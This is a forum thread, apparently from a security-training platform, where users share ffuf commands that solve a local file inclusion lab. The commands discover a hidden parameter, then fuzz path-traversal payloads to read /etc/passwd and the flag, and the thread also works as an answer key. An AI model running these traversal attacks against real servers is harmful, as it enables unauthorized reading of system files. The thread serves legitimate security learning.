File Inclusion/Automated Scanning[questions]

| grep -v 2309
was looking for " | grep -v 2309" this on google… and find this in your comment on the forum… good work man… thanks

Hello.

Actually, the solution is very simple. If you know how to use the Fuff tool, the solution will take 3 minutes.

First, we use “burp-parameter-names.txt” payloads to find the parameter. We are filtering the “-fs” result size.

ffuf -w burp-parameter-names.txt:FUZZ -u "http://46.101.82.246:30730/index.php?FUZZ=value" -fs 2309

-fs size may differ.

XXXX = the 1 parameter you found.

After finding XXXX. Try “LFI-Jhaddix.txt” payloads to read /etc/passwd file.

ffuf -w LFI-Jhaddix.txt:FUZZ -u "http://46.101.82.246:30730/index.php?XXXX=FUZZ" -fs 1935 

You will be successful when you do the filtering process with Fuff.

4 Likes

step first
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u ‘http://IP:PORT/index.php?FUZZ=value’ -fs 2287
for find size
then
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u ‘http://IP:PORT/index.php?FUZZ=value’ -fs “size found”
and then
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u ‘http://IP:PORT/index.php?FUZZ=value’ -fs “size found”
you will see *FUZZ = xxxx 4 chatactor
and then
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u ‘http://94.237.62.195:44373/index.php?xxxx=FUZZ’ -fs “size found”
You will found
…/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/etc/passwd
replace etc/passwd with flag.txt
you will see flag HTB{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}

with fuzzing i get v*** but i cant figure out this “You will found
…/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/etc/passwd” where i get 700 resonse from ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u ‘http://94.237.62.195:44373/index.php?xxxx=FUZZ’ -fs “

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u ‘http://94.237.62.195:44373/index.php?view=FUZZ’ -fs 1935

instead etc/passwd with flag.txt

Thanks by the explanation support me to understand how works this skills assignments.